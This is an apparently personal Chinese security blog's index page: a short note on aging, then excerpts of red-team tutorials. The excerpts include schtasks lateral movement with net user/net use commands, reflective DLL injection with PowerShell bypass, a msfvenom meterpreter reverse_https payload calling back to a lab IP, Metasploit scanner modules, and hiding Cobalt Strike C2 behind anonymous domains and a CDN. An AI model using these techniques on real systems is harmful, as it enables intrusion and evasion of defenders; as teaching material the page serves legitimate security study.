老年人的生活 最近换了一份工作。也跟三十岁左右的男性打了一些交道,感受到岁月的残酷。 高铁上看着坐在我右边的某人头发上的白发;我以为某大佬三十多了(35以上)其实他才29;micro8在每篇文章中都说要多喝水,因为喝水喝少了,得了肾结石。 我们马上就要老了。 工作步入了正轨。 我已经完成了18岁的我的诺言,要成为一个会拉小提琴的黑客。 已经过去好多年了。大半夜的忽然有些感慨。原来我也是给能给新人指点迷津的老师傅 2021-04-08 experience experience
横向移动:schtasks远程计划任务 视频教程:横向移动手法介绍 拓扑图 执行的命令1234567891011121314151617181920212223242526272829303132333435363738394041net user administrator 123456net user administrator qwe123!net use \\192.168.123.67\admin$ /user:"a 2021-04-04 windows windows lateral-movement
反射式dll注入的演示 Powershell反射式dll注入 dll注入和反射式dll注入的区别合法进程 恶意dll 从本地或者dll调用 【生成恶意载荷,并执行web服务托管dll】 省略 【目标机器载入内存,使用反射式dll注入直接载入内存不落盘】 1234567PowerShell -Exec BypassImport-Module C:\Users\whale\Desktop\Invoke-Reflecti 2021-03-09 evasion evasion
dll注入的演示 前景提要whale的DLLHijack本地提权教程 进程注入与迁移 本期内容dll注入的演示 1.exe 2.exe msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.123.138 lport=2333 -f dll -o whale.dll python -m SimpleHTTPServer 80 handler 2021-03-07 evasion evasion
进程注入与迁移 进程注入与迁移 进程和线程的区别https://segmentfault.com/a/1190000039297639 进程,线程(公司)(人)卖食品、饮料、医疗、交通、房地产公司进程里有多个线程,就像一个公司里有多个员工 直接反弹shell的缺点: 进程注入的目的 进程的权限控制Integrity Levelhttps://blog.csdn.net/vlily/article/detai 2021-03-04 evasion evasion
应届生的面试题(四) 面试题1234567891011121314151617181920212223241、绕WAF2、反序列化 fastjson3、流量加密4、XXE5、命令执行 php&java的区别6、溯源7、中间件8、代码审计7、注入8、SSRF9、内网要怎么打1.证书透明2.Windows的Redis主从RCE3.PTH怎么利用和NTML验证端口是什么4.git和svn,svn5.CS怎么联 2021-02-20 Interview Interview
05-msf的泛微OA-rce扫描模块 写一个泛微OA的scanner扫描模块 这是python3的模块,使用方法是放到kali对应目录下:/usr/share/metasploit-framework/modules/auxiliary/scanner/http/weaver_e_cology_rce_scanner.py 12345678910111213141516171819202122232425262728293031323 2021-02-19 metasploit metasploit
04-redis未授权扫描模块 需要的资料 msf开发文档 metasploit 脚本开发基础知识,ruby语法 Shodan搜索引擎介绍、以及如何在Linux命令行安装 redis未授权访问漏洞复现 课程结构 shodan被动信息搜集,寻找有redis服务的主机 metasploit改插件,判断是否存在redis漏洞 验证漏洞扫描结果 总结 录制的视频msf开发实践(一)redis未授权扫描模块 1234567891011 2021-02-10 metasploit metasploit
cobaltstrike通过域名上线(六) 匿名邮箱注册https://mail.protonmail.com/login 注册免费域名http://www.freenom.com/en/index.html 配置CDN注册一个cloudflare账号,将注册好的域名解析到ip https://dash.cloudflare.com/login 具体怎么配置,查看这篇文章: 通过Cloudflare开启全站https cobaltstri 2021-02-06 cobaltstrike cobaltstrike